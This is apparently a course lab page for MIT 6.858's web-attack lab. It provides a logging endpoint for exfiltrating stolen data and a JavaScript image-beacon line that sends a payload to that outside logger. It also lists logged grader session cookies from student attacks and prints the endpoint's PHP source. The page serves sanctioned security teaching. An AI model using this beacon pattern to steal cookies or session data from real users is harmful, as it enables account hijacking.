You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.858/2020/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
Sat, 23 May 2026 07:16:43 +0000: kmi: grader/LRLSTPDYANFH Sat, 23 May 2026 07:16:32 +0000: kmi: grader/KUVBLUPCNKLO Sat, 23 May 2026 07:16:28 +0000: kmi: grader/XCQDITIQIMZM Sat, 23 May 2026 07:16:13 +0000: kmi: PyZoobarLogin=grader#d6be5d6dc84dd62daf5c0bf281d294ab Sat, 23 May 2026 07:16:08 +0000: kmi: PyZoobarLogin=grader#82f17f40ce10bc7eee8a0818293b52aa Sat, 23 May 2026 07:15:57 +0000: kmi: PyZoobarLogin=grader#d4802cd4babfa6f0d130f899afaf047a Sat, 23 May 2026 07:14:22 +0000: kmi: grader/WRQJZIFIAWAU Sat, 23 May 2026 07:14:11 +0000: kmi: grader/ESNMFCENOKDS Sat, 23 May 2026 07:14:07 +0000: kmi: grader/PUAWJRVKEMOT Sat, 23 May 2026 07:13:52 +0000: kmi: PyZoobarLogin=grader#bb96e31ce23b09db81bf7ef9e244265e Sat, 23 May 2026 07:13:47 +0000: kmi: PyZoobarLogin=grader#bcecd3b1fa71e6a3e6424dda2b000bf7 Sat, 23 May 2026 07:13:36 +0000: kmi: PyZoobarLogin=grader#e025dd2fcd8fe263f0e6aea9c4578911 Sat, 23 May 2026 07:08:17 +0000: kmi: grader/KQDEKLJOQQVS Sat, 23 May 2026 07:08:06 +0000: kmi: grader/THGCWXZRVDRI Sat, 23 May 2026 07:08:02 +0000: kmi: grader/MIIUAJEHYZQA Sat, 23 May 2026 07:07:47 +0000: kmi: PyZoobarLogin=grader#7c30f56a85238590223d55aa75e6df72 Sat, 23 May 2026 07:07:42 +0000: kmi: PyZoobarLogin=grader#1c00a1d2b8ad730bf9758186c2c3ad6b Sat, 23 May 2026 07:07:32 +0000: kmi: PyZoobarLogin=grader#90a854c4d6f93c6e9b177819fbb550c5 Sat, 23 May 2026 07:03:25 +0000: kmi: grader/TNCEBBWGLHEF Sat, 23 May 2026 07:03:14 +0000: kmi: grader/SGEZQMHJHXHJ Sat, 23 May 2026 07:03:09 +0000: kmi: grader/TBMBIHNOMLUL Sat, 23 May 2026 07:02:54 +0000: kmi: PyZoobarLogin=grader#3a2c1f1c90a70eda2ab6ae70bdfb0830 Sat, 23 May 2026 07:02:49 +0000: kmi: PyZoobarLogin=grader#2a3c0056ed55995f68ee70fa4b23972b Sat, 23 May 2026 07:02:37 +0000: kmi: PyZoobarLogin=grader#952d59f488fcf834af10d99385d818a9 Sat, 23 May 2026 06:56:44 +0000: kmi: grader/ANZMBKJQRMXL Sat, 23 May 2026 06:56:33 +0000: kmi: grader/TVXNKEHJREHQ Sat, 23 May 2026 06:56:13 +0000: kmi: PyZoobarLogin=grader#11c76e21e1c18dfc613c3a62bb872e99 Sat, 23 May 2026 06:56:07 +0000: kmi: PyZoobarLogin=grader#4e5492e3f2c4138579f5a9a54ce2adcd Sat, 23 May 2026 06:55:56 +0000: kmi: PyZoobarLogin=grader#abf4b41b3cfaf4a8a6ac24fc77788ba4 Sat, 23 May 2026 06:50:57 +0000: kmi: grader/WLXLZHFMPXZN Sat, 23 May 2026 06:50:41 +0000: kmi: grader/VKRYTHRGDTTS Sat, 23 May 2026 06:50:26 +0000: kmi: PyZoobarLogin=grader#3ad0e9bacc0c9ba424126c9835f3f012 Sat, 23 May 2026 06:50:20 +0000: kmi: PyZoobarLogin=grader#2b4877b9b131195690d41bab5f2f47f7 Sat, 23 May 2026 06:50:09 +0000: kmi: PyZoobarLogin=grader#5af215e60cbf40999b91613b19d25b36 Sat, 23 May 2026 04:13:38 +0000: hola: WLZRTMHAXMMR Sat, 23 May 2026 04:13:29 +0000: hola: grader/NWXYXUNWEWRO Sat, 23 May 2026 04:13:26 +0000: hola: grader/RQFUYPFZBLVU Sat, 23 May 2026 04:13:17 +0000: hola: grader#285173ada0cf00ef13eaa311a2334b3d Sat, 23 May 2026 04:13:13 +0000: hola: grader#49408173de261e77399ed739074f7f5a Sat, 23 May 2026 04:13:06 +0000: hola: grader#1819906ccb79e16c29c1f61a2f97c7af Sat, 23 May 2026 04:09:02 +0000: hola: grader/IUCOSSRSEZPW Sat, 23 May 2026 04:08:54 +0000: hola: grader/MFEFIPFPUMTN Sat, 23 May 2026 04:08:51 +0000: hola: grader/ICBGXWKKOCJM Sat, 23 May 2026 04:08:42 +0000: hola: grader#a775c7c106d2a53fe2ea44c7d28c45c1 Sat, 23 May 2026 04:08:38 +0000: hola: grader#2706ff579daa295957ed0481ad85c40e Sat, 23 May 2026 04:08:30 +0000: hola: grader#01d5ca45055fe0c015896579ee37fd5a Sat, 23 May 2026 04:07:49 +0000: hola: grader/GQMJXGCDQGXR Sat, 23 May 2026 04:07:41 +0000: hola: grader/ULSCGROTGHNM Sat, 23 May 2026 04:05:14 +0000: hola: grader/STPWUGMJKTMI Sat, 23 May 2026 04:05:03 +0000: hola: grader/VAJSOIPYZFPT Sat, 23 May 2026 04:04:54 +0000: hola: grader#2b8b019d428de2c809b092f2f3adaeee Sat, 23 May 2026 04:04:50 +0000: hola: grader#47df4e7bfa5d0909f1ecd00a86f7b9b5 Sat, 23 May 2026 04:04:42 +0000: hola: grader#e4e9fca0a208170c9620fde41269533b Sat, 23 May 2026 04:01:45 +0000: kmi: grader/JQMCBOKXGDKO Sat, 23 May 2026 04:01:34 +0000: hola: grader/SZKWDBLGSGUG Sat, 23 May 2026 04:01:25 +0000: hola: grader#dde6c9dfca41448e6df523389b85dc8a Sat, 23 May 2026 04:01:21 +0000: hola: grader#0171facf4d8ef8d2b269b0ddea22616c Sat, 23 May 2026 04:01:14 +0000: hola: grader#502cbeebe32f55d0befd79e0ff5af235 Sat, 23 May 2026 03:56:19 +0000: kmi: grader/LVAJDHBKZYDC Sat, 23 May 2026 03:56:07 +0000: hola: grader/HOGPVOUJWISO Sat, 23 May 2026 03:55:58 +0000: hola: grader#de1651c1afcdb95172815e0e524c2798 Sat, 23 May 2026 03:55:54 +0000: hola: grader#e748234c95aeff158667bfd10aaac2cd Sat, 23 May 2026 03:55:47 +0000: hola: grader#5f55399438afe36e844418781add359f Sat, 23 May 2026 03:52:52 +0000: kmi: grader/RRIFFGGZWGUR Sat, 23 May 2026 03:52:20 +0000: kmi: grader/VYDCWVTWKHAE Sat, 23 May 2026 03:14:55 +0000: kmi: grader/JQQJRXONHLKF Sat, 23 May 2026 03:14:44 +0000: kmi: grader/SLXRVXSFQLFJ Sat, 23 May 2026 03:14:25 +0000: kmi: PyZoobarLogin=grader#093f36cb365609937adb02f460f147a8 Sat, 23 May 2026 03:14:20 +0000: kmi: PyZoobarLogin=grader#3d8d4260c397accc9fe85cc3d0bb6eb9 Sat, 23 May 2026 03:14:09 +0000: kmi: PyZoobarLogin=grader#cf324612d5fdfbb0fab73ed96d5139bf Sat, 23 May 2026 03:07:35 +0000: kmi: grader/XKWITSVAXOIW Sat, 23 May 2026 03:07:24 +0000: hola: grader/ACRBAQZCFDVP Sat, 23 May 2026 03:07:15 +0000: hola: grader#d6d379aceb5cb2168509b8f1bbca02b1 Sat, 23 May 2026 03:07:11 +0000: hola: grader#1d8e0375b89ce7a4580d6572b08b73c7 Sat, 23 May 2026 03:07:03 +0000: hola: grader#5eed0726496d13601c96d396a247cfee Sat, 23 May 2026 03:06:30 +0000: kmi: grader/YSMCMKLRCVBG Sat, 23 May 2026 03:06:20 +0000: kmi: grader/OKMBPRGVTSEW Sat, 23 May 2026 03:06:15 +0000: kmi: grader/VZGKTDTNJLKD Sat, 23 May 2026 03:06:01 +0000: kmi: PyZoobarLogin=grader#ae10c51492c89d0f984b70be97cce277 Sat, 23 May 2026 03:05:55 +0000: kmi: PyZoobarLogin=grader#d2533b4d3f441f4908fb19e7e7b5efe5 Sat, 23 May 2026 03:05:45 +0000: kmi: PyZoobarLogin=grader#b068aab3d2adf26362ae92d8e129de46 Sat, 23 May 2026 03:04:15 +0000: kmi: grader/YHNEMRLXJPYF Sat, 23 May 2026 03:04:12 +0000: kmi: grader/TBOHETJEITCO Sat, 23 May 2026 03:04:04 +0000: hola: grader/NXKFFJVXQOJK Sat, 23 May 2026 03:04:01 +0000: kmi: grader/CNYIMODERNUN Sat, 23 May 2026 03:03:57 +0000: kmi: grader/HOHSCGPENPZJ Sat, 23 May 2026 03:03:55 +0000: hola: grader#9bf76f4e18133b82898a27720de828cf Sat, 23 May 2026 03:03:50 +0000: hola: grader#c941cd607fbc456e4fcb3cad77a367e0 Sat, 23 May 2026 03:03:43 +0000: hola: grader#2464455fb60a3a1a0879631ed9b7a5b5 Sat, 23 May 2026 03:03:43 +0000: kmi: PyZoobarLogin=grader#37d9b8fea56a3d8b836b141692c75b51 Sat, 23 May 2026 03:03:37 +0000: kmi: PyZoobarLogin=grader#c21be738749ce70915ecb922fffaa2d2 Sat, 23 May 2026 03:03:26 +0000: kmi: PyZoobarLogin=grader#1d205a980555aa42f731ddfca8405733 Sat, 23 May 2026 03:02:22 +0000: kmi: grader/KDRFAGFGWLZC Sat, 23 May 2026 03:02:11 +0000: kmi: grader/TGFAPHMWCBTM Sat, 23 May 2026 03:02:06 +0000: kmi: grader/MBUJKAXBWNJE Sat, 23 May 2026 03:01:51 +0000: kmi: PyZoobarLogin=grader#388da4bcf9857df6adae9438aa65e03e Sat, 23 May 2026 03:01:45 +0000: kmi: PyZoobarLogin=grader#744b1809ab0aa05689ca4362e7fe2cc0 Sat, 23 May 2026 03:01:34 +0000: kmi: PyZoobarLogin=grader#e85cf1ecdee1685227493d8d4c666a6c Sat, 23 May 2026 02:59:19 +0000: kmi: grader/CVDESWCNVJAX Sat, 23 May 2026 02:59:08 +0000: kmi: grader/GEDPVLDFMIQU Sat, 23 May 2026 02:59:03 +0000: kmi: grader/YAIKMAGIZMOF
In case you are curious, here is the source code of this page.
<?php do { if (!array_key_exists("id", $_REQUEST)) { break; } $id = $_REQUEST['id']; if (strlen($id) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "ID value is larger than 1000 bytes"; return; } if (!array_key_exists("payload", $_REQUEST)) { header("HTTP/1.0 400 Bad Request"); echo "No payload given"; return; } $payload = $_REQUEST['payload']; if (empty($payload)) { header("HTTP/1.0 400 Bad Request"); echo "Empty payload given"; return; } if (strlen($payload) > 1000) { header("HTTP/1.0 413 Payload Too Large"); echo "Payload is larger than 1000 bytes"; return; } if (!function_exists('apcu_add')) { header("HTTP/1.0 501 Not Implemented"); echo "APCu not enabled, so no rate limiting; refusing all requests"; return; } if (apcu_add($payload, true, 5) === false) { // exact same $payload was sent in the past 5 seconds header("HTTP/1.0 429 Too Many Requests"); echo "That exact payload was sent very recently; rejecting"; return; } $payload = str_replace(array("\n", "\r"), '.', $payload); $id = str_replace(array("\n", "\r"), '.', $id); $file = fopen("/tmp/6.858-logger.txt", "c+"); if ($file === false) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to open log file"; return; } if (!flock($file, LOCK_EX)) { header("HTTP/1.0 503 Service Unavailable"); echo "Failed to lock log file"; return; } $lines = array(); while (!feof($file) && count($lines) < 100) { $lines[] = fgets($file); } ftruncate($file, 0); rewind($file); fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n"); foreach ($lines as &$line) { fwrite($file, $line); } flock($file, LOCK_UN); fclose($file); echo "Logged!"; return; } while(0); $link = "(new Image()).src=" . "'https://css.csail.mit.edu/6.858/2020/labs/log.php?'" . " + 'id=my-username'" . " + '&payload=some-string' + '&random='" . " + Math.random()"; ?><!DOCTYPE html> <html> <head> <link rel="stylesheet" type="text/css" href="labs.css" /> <title>Lab 4 Logging Script</title> </head> <body> <h1>Lab 4 Logging Script</h1> <p> You can use this server side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload: </p> <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre> <p> The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in <tt>javascript:</tt> links; if this bothers you, try <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>. </p> <h2>Test form</h2> <p> If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.) </p> <form method="GET" action=""> <label for="id">ID:</label><br /> <input name="id" placeholder="your-mit-username" size="40" /> <i>(some identifier to locate your payload in the log)</i> <br /> <br /> <label for="payload">Payload:</label><br /> <input name="payload" placeholder="some-string" size="40" /> <i>(the information you stole)</i> <br /> <input type="submit" value="Log" name="log_submit" /> </form> <h2>Logged entries</h2> <p> Below are the most recent logged entries, so that you can check if your attack worked: </p> <pre class="tty"><?php $lines = file_get_contents("/tmp/6.858-logger.txt"); echo htmlspecialchars($lines); ?></pre> <h2>Source code</h2> <p>In case you are curious, here is the source code of this page.</p> <pre><?php highlight_file(__FILE__); ?></pre> </body> </html>